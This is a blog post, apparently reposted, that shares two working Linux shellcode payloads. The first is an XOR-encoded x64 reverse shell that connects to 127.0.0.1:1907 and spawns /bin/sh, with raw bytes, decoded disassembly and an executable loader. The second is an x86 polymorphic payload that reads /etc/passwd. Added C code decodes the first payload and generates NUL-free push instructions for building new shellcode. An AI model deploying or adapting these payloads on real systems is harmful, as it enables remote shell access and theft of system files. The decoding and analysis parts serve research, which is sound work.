[Shellcode share] Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 bytes)
Posted by IT鹅
Disclaimer:
This PoC is provided solely for security research and teaching. Anyone who uses the information in it for any other purpose bears full legal and joint liability; neither the CSDN blog platform nor the blogger IT鹅 accepts any legal or joint liability.
Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)
/*
reverse shell tcp (1907) port shellcode, C language - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
Test:
on your machine run: nc -vlp 1907
then run the loader: ./reverse-shell
The sockaddr baked into the decoded payload is 127.0.0.1:1907 (not 0.0.0.0),
so the nc listener and the loader must run on the same host. In the nc
session, try ls, who and pwd.
Shellcode raw bytes:
: 0x48 0x31 0xc9 0x48 0x81 0xe9 0xf6 0xff
: 0xff 0xff 0x48 0x8d 0x05 0xef 0xff 0xff
: 0xff 0x48 0xbb 0xdf 0x4b 0x06 0xb1 0x71
: 0x71 0x46 0x28 0x48 0x31 0x58 0x27 0x48
: 0x2d 0xf8 0xff 0xff 0xff 0xe2 0xf4 0xb5
: 0x62 0x5e 0x28 0x1b 0x73 0x19 0x42 0xde
: 0x15 0x09 0xb4 0x39 0xe6 0x0e 0x91 0xdd
: 0x4b 0x01 0xc2 0x0e 0x71 0x46 0x29 0x8e
: 0x03 0x8f 0x57 0x1b 0x61 0x1c 0x42 0xf5
: 0x13 0x09 0xb4 0x1b 0x72 0x18 0x60 0x20
: 0x85 0x6c 0x90 0x29 0x7e 0x43 0x5d 0x29
: 0x21 0x3d 0xe9 0xe8 0x39 0xfd 0x07 0xbd
: 0x22 0x68 0x9e 0x02 0x19 0x46 0x7b 0x97
: 0xc2 0xe1 0xe3 0x26 0x39 0xcf 0xce 0xd0
: 0x4e 0x06 0xb1 0x71 0x71 0x46 0x28
Assembly: the first 39 bytes are a self-decoding stub (AT&T syntax, as gdb shows it):
    xor    %rcx,%rcx
    sub    $0xfffffffffffffff6,%rcx     # rcx = 10; "sub -10" instead of "mov" keeps the stub NUL-free
    lea    -0x11(%rip),%rax             # rax = address of the shellcode's first byte
    movabs $0x28467171b1064bdf,%rbx     # 8-byte XOR key
decode:
    xor    %rbx,0x27(%rax)              # decrypt one qword, starting at offset 0x27 (39)
    sub    $0xfffffffffffffff8,%rax     # rax += 8
    loop   decode                       # 10 rounds = 80 bytes, then fall through into the payload
Disassembling the raw bytes past the loop (which is what a plain gdb or objdump pass
does) only produces junk like "ficoms" and "(bad)", because those 80 bytes are still
XOR-encoded. Once the stub has run, they read:
    pushq  $0x29
    pop    %rax                         # socket
    cltd                                # rdx = 0 (protocol)
    pushq  $0x2
    pop    %rdi                         # AF_INET
    pushq  $0x1
    pop    %rsi                         # SOCK_STREAM
    syscall
    xchg   %rax,%rdi                    # rdi = socket fd
    movabs $0x100007f73070002,%rcx      # sockaddr_in: AF_INET, port 0x0773 = 1907 (network order), 127.0.0.1
    push   %rcx
    mov    %rsp,%rsi                    # rsi = &sockaddr
    pushq  $0x10
    pop    %rdx                         # addrlen = 16
    pushq  $0x2a
    pop    %rax                         # connect
    syscall
    pushq  $0x3
    pop    %rsi
dup:
    dec    %rsi                         # 2, 1, 0
    pushq  $0x21
    pop    %rax                         # dup2(sockfd, rsi)
    syscall
    jne    dup                          # ZF from dec survives the syscall
    pushq  $0x3b
    pop    %rax                         # execve
    cltd                                # rdx = NULL envp
    movabs $0x68732f6e69622f,%rbx       # "/bin/sh\0"
    push   %rbx
    mov    %rsp,%rdi                    # rdi = "/bin/sh"
    push   %rdx
    push   %rdi
    mov    %rsp,%rsi                    # argv = {"/bin/sh", NULL}
    syscall
The last six bytes of the payload are 0x00 padding; XORed with the key they become the
non-NUL tail 0x06 0xb1 0x71 0x71 0x46 0x28 of the encoded form, which is why the whole
119-byte blob survives strlen() in the loader below.
*/
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellproccod[] =
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xdf\x4b\x06\xb1\x71\x71\x46\x28\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb5\x62\x5e\x28\x1b\x73"
"\x19\x42\xde\x15\x09\xb4\x39\xe6\x0e\x91\xdd\x4b\x01\xc2\x0e"
"\x71\x46\x29\x8e\x03\x8f\x57\x1b\x61\x1c\x42\xf5\x13\x09\xb4"
"\x1b\x72\x18\x60\x20\x85\x6c\x90\x29\x7e\x43\x5d\x29\x21\x3d"
"\xe9\xe8\x39\xfd\x07\xbd\x22\x68\x9e\x02\x19\x46\x7b\x97\xc2"
"\xe1\xe3\x26\x39\xcf\xce\xd0\x4e\x06\xb1\x71\x71\x46\x28";

int main(void)
{
    size_t len = strlen((char *)shellproccod);   /* 119: the encoded form contains no NUL byte */
    printf("Shellcode len: %zu\n", len);

    /* The stub rewrites its own payload (xor [rax+0x27],rbx), so the bytes
     * need memory that is writable and executable at the same time. A global
     * array lives in .data, and on 64-bit binaries -z execstack no longer
     * makes .data executable from Linux 5.8 on, so copy the bytes into an
     * explicit RWX anonymous mapping before jumping to them. */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(mem, shellproccod, len);
    ((void (*)(void))mem)();
    return 0;
}
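Before running a self-decoding blob like this one it is worth recovering the plaintext offline. The following is an added example (the editor's code, not part of the original post or the shellcode author's loader): it parses the decoder parameters out of the stub's own opcodes, applies the same XOR the stub would apply at run time, and reads the hard-coded sockaddr_in out of the decoded payload. The byte array is a constructed copy of the raw bytes listed above; the struct and function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed copy of the 119 raw bytes listed above. */
static const unsigned char encoded[119] = {
    0x48,0x31,0xc9,0x48,0x81,0xe9,0xf6,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,
    0xff,0x48,0xbb,0xdf,0x4b,0x06,0xb1,0x71,0x71,0x46,0x28,0x48,0x31,0x58,0x27,0x48,
    0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xb5,0x62,0x5e,0x28,0x1b,0x73,0x19,0x42,0xde,
    0x15,0x09,0xb4,0x39,0xe6,0x0e,0x91,0xdd,0x4b,0x01,0xc2,0x0e,0x71,0x46,0x29,0x8e,
    0x03,0x8f,0x57,0x1b,0x61,0x1c,0x42,0xf5,0x13,0x09,0xb4,0x1b,0x72,0x18,0x60,0x20,
    0x85,0x6c,0x90,0x29,0x7e,0x43,0x5d,0x29,0x21,0x3d,0xe9,0xe8,0x39,0xfd,0x07,0xbd,
    0x22,0x68,0x9e,0x02,0x19,0x46,0x7b,0x97,0xc2,0xe1,0xe3,0x26,0x39,0xcf,0xce,0xd0,
    0x4e,0x06,0xb1,0x71,0x71,0x46,0x28 };

struct stub {            /* the four parameters the decoder loop is built from */
    uint64_t key;        /* movabs rbx, imm64: 8-byte XOR key */
    uint32_t rounds;     /* value loaded into rcx: loop iterations */
    uint32_t start;      /* disp8 of xor [rax+disp8], rbx: payload offset */
    uint32_t stride;     /* bytes added to rax per iteration */
};
struct target { uint16_t family, port; uint32_t addr; };

static uint32_t le32(const unsigned char *p) {
    return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Read the decoder parameters out of the stub's own opcodes. Every fixed
 * byte is checked, so an unfamiliar stub is refused instead of mis-decoded. */
int parse_stub(const unsigned char *sc, size_t n, struct stub *st) {
    if (n < 39) return 0;
    if (memcmp(sc,      "\x48\x31\xc9\x48\x81\xe9", 6))             return 0; /* xor rcx,rcx; sub rcx,imm32 */
    if (memcmp(sc + 10, "\x48\x8d\x05\xef\xff\xff\xff\x48\xbb", 9)) return 0; /* lea rax,[rip-0x11]; movabs rbx */
    if (memcmp(sc + 27, "\x48\x31\x58", 3))                         return 0; /* xor [rax+disp8],rbx */
    if (memcmp(sc + 31, "\x48\x2d", 2))                             return 0; /* sub rax,imm32 */
    if (memcmp(sc + 37, "\xe2\xf4", 2))                             return 0; /* loop -12 */
    st->rounds = 0u - le32(sc + 6);                                 /* sub rcx,-10 => 10 */
    st->key    = le32(sc + 19) | (uint64_t)le32(sc + 23) << 32;
    st->start  = sc[30];
    st->stride = 0u - le32(sc + 33);                                /* sub rax,-8  => +8 */
    return 1;
}

/* Apply exactly the XOR the stub performs at run time and return the decoded
 * length, or 0 if the stub is unrecognised or its loop would run off the end. */
size_t decode_payload(const unsigned char *sc, size_t n, unsigned char *out, size_t outsz) {
    struct stub st;
    if (!parse_stub(sc, n, &st) || st.start >= n || n - st.start > outsz) return 0;
    size_t len = n - st.start;
    memcpy(out, sc + st.start, len);
    for (uint32_t r = 0; r < st.rounds; r++) {
        size_t off = (size_t)r * st.stride;
        if (off + 8 > len) return 0;
        for (int i = 0; i < 8; i++)
            out[off + i] ^= (unsigned char)(st.key >> (8 * i));
    }
    return len;
}

/* The payload builds its sockaddr_in with one movabs rcx, imm64
 * (48 b9 <family> <port, big-endian> <a.b.c.d>); locate it and pull the fields out. */
int find_sockaddr(const unsigned char *p, size_t n, struct target *t) {
    for (size_t i = 0; i + 10 <= n; i++) {
        if (p[i] != 0x48 || p[i + 1] != 0xb9) continue;
        const unsigned char *s = p + i + 2;
        t->family = (uint16_t)(s[0] | s[1] << 8);
        t->port   = (uint16_t)(s[2] << 8 | s[3]);
        t->addr   = (uint32_t)s[4] << 24 | s[5] << 16 | s[6] << 8 | s[7];
        return 1;
    }
    return 0;
}

size_t count_nul(const unsigned char *p, size_t n) {
    size_t c = 0;
    for (size_t i = 0; i < n; i++) c += (p[i] == 0);
    return c;
}

/* Accessors over the page's bytes, so single values can be checked. */
size_t page_decoded_len(void) { unsigned char b[128]; return decode_payload(encoded, sizeof encoded, b, sizeof b); }
int page_decoded_byte(size_t i) { unsigned char b[128]; size_t n = decode_payload(encoded, sizeof encoded, b, sizeof b); return i < n ? b[i] : -1; }
size_t page_decoded_nuls(void) { unsigned char b[128]; size_t n = decode_payload(encoded, sizeof encoded, b, sizeof b); return count_nul(b, n); }
struct target page_target(void) { struct target t = {0, 0, 0}; unsigned char b[128]; size_t n = decode_payload(encoded, sizeof encoded, b, sizeof b); find_sockaddr(b, n, &t); return t; }

int main(void) {
    unsigned char plain[128];
    struct target t;
    size_t n = decode_payload(encoded, sizeof encoded, plain, sizeof plain);
    if (!n) { fputs("unrecognised decoder stub\n", stderr); return 1; }
    printf("decoded %zu bytes; NUL bytes: %zu encoded, %zu decoded\n",
           n, count_nul(encoded, sizeof encoded), count_nul(plain, n));
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", plain[i], (i % 16 == 15 || i + 1 == n) ? '\n' : ' ');
    if (find_sockaddr(plain, n, &t))
        printf("connect-back target: %u.%u.%u.%u:%u (family %u)\n",
               t.addr >> 24, (t.addr >> 16) & 255, (t.addr >> 8) & 255, t.addr & 255,
               (unsigned)t.port, (unsigned)t.family);
    return 0;
}
```

The decoded 80 bytes start with `6a 29 58` (push 0x29; pop rax, the socket syscall) and end with `0f 05` followed by six bytes of zero padding; the sockaddr comes out as family 2, port 1907, address 127.0.0.1. The same parse-then-emulate approach works for any stub of this shape, and the opcode checks make it fail loudly on one that differs.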
Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 bytes)
; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; Filename: headpass.nasm
; SLAE-ID: 1327
; Based on: http://shell-storm.org/shellcode/files/shellcode-571.php
; Shellcode: "\x29\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe6\x50\x68\x2d\x6e\x39\x39\x89\xe7\x50\x68\x68\x65\x61\x64\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x57\x56\x53\xb0\x0b\x89\xe1\xcd\x80"
global _start
section .text
_start:
    sub eax, eax            ; eax = 0 (polymorphic change from the original's xor eax, eax)
    push eax                ; NUL terminator
    push dword 0x64777373   ; "sswd"
    push dword 0x61702f63   ; "c/pa"
    push dword 0x74652f2f   ; "//et"  -> "//etc/passwd" (the extra '/' pads it to 12 bytes)
    mov esi, esp            ; esi = "//etc/passwd"
    push eax
    push dword 0x39396e2d   ; "-n99"
    mov edi, esp            ; edi = "-n99"
    push eax
    push dword 0x64616568   ; "head"
    push dword 0x2f6e6962   ; "bin/"
    push dword 0x2f2f2f2f   ; "////"  padding so the path is a multiple of 4 bytes
    push dword 0x7273752f   ; "/usr"  -> "/usr////bin/head" (changed from cat to head)
    mov ebx, esp            ; ebx = pathname (unchanged from the original)
    ; mov edx, eax          ; envp: left out to save two bytes, so edx keeps whatever it
                            ; held on entry; uncomment if execve fails with EFAULT
    push eax                ; argv terminator
    push edi                ; argv[2] = "-n99"
    push esi                ; argv[1] = "//etc/passwd" (GNU head accepts the option after the file name)
    push ebx                ; argv[0] = "/usr////bin/head"
    mov al, 0xb             ; SYS_execve
    mov ecx, esp            ; ecx = argv
    int 0x80
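The trick that keeps this payload NUL-free is visible in the listing: every string is padded to a multiple of four bytes with extra '/' (which the kernel collapses) and pushed as little-endian dwords in reverse order. The following is an added example (the editor's code, not the post's or the shellcode author's) that mechanises exactly that, so the `push dword` immediates above can be regenerated for other paths and arguments. It pads at the start of the path ("////usr/bin/head") where the page's author padded in the middle ("/usr////bin/head"); both resolve identically on Linux. All function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Pad an absolute path with extra '/' after the leading slash until its
 * length is a multiple of 4. Linux collapses repeated slashes, so the padded
 * path resolves like the original. Returns 1 on success, 0 if the path is
 * not absolute or the buffer is too small. */
int pad_path(const char *path, char *out, size_t outsz) {
    size_t n = strlen(path);
    size_t pad = (4 - n % 4) % 4;
    if (path[0] != '/' || n + pad + 1 > outsz) return 0;
    memset(out, '/', pad + 1);
    memcpy(out + pad + 1, path + 1, n);   /* rest of the path plus its NUL */
    return 1;
}

/* Split s into the dwords to push, last chunk first, so the bytes land on the
 * stack in reading order. Returns the count, or 0 if the length is not a
 * multiple of 4, the buffer is too small, or any dword would carry a 0x00
 * byte (which would truncate the shellcode when it travels as a C string). */
size_t push_dwords(const char *s, uint32_t *out, size_t max) {
    size_t n = strlen(s), k = n / 4;
    if (n == 0 || n % 4 || k > max) return 0;
    for (size_t i = 0; i < k; i++) {
        const unsigned char *p = (const unsigned char *)s + (k - 1 - i) * 4;
        if (!p[0] || !p[1] || !p[2] || !p[3]) return 0;
        out[i] = p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
    }
    return k;
}

/* i-th push immediate for s, or 0 when s cannot be encoded. */
uint32_t push_dword_at(const char *s, size_t i) {
    uint32_t d[16];
    size_t k = push_dwords(s, d, 16);
    return i < k ? d[i] : 0;
}

/* Length of the padded form of path, or 0 if it cannot be padded. */
size_t padded_len(const char *path) {
    char b[64];
    return pad_path(path, b, sizeof b) ? strlen(b) : 0;
}

/* Print the nasm lines that leave a NUL-terminated copy of s on the stack and
 * its address in reg. eax is assumed to hold 0, as it does in the payload. */
void emit_push_string(const char *s, const char *reg) {
    uint32_t d[16];
    size_t k = push_dwords(s, d, 16);
    if (!k) { printf("; \"%s\" cannot be pushed NUL-free\n", s); return; }
    printf("push eax                ; terminator for \"%s\"\n", s);
    for (size_t i = 0; i < k; i++)
        printf("push dword 0x%08x   ; \"%.4s\"\n", d[i], s + (k - 1 - i) * 4);
    printf("mov %s, esp\n", reg);
}

int main(void) {
    char head[32], passwd[32];
    /* Same three strings as the payload above; argv order there is
     * head, file, "-n99", which GNU head accepts because getopt permutes. */
    if (!pad_path("/usr/bin/head", head, sizeof head) ||
        !pad_path("/etc/passwd", passwd, sizeof passwd)) return 1;
    emit_push_string(passwd, "esi");
    emit_push_string("-n99", "edi");
    emit_push_string(head, "ebx");
    return 0;
}
```

Run against the page's own strings, the generator reproduces the listing's immediates: "//etc/passwd" gives 0x64777373, 0x61702f63, 0x74652f2f in push order and "/usr////bin/head" gives 0x64616568, 0x2f6e6962, 0x2f2f2f2f, 0x7273752f. An argument such as "-n9" that is not a multiple of four bytes and cannot be slash-padded is rejected rather than silently producing a dword with a NUL in it.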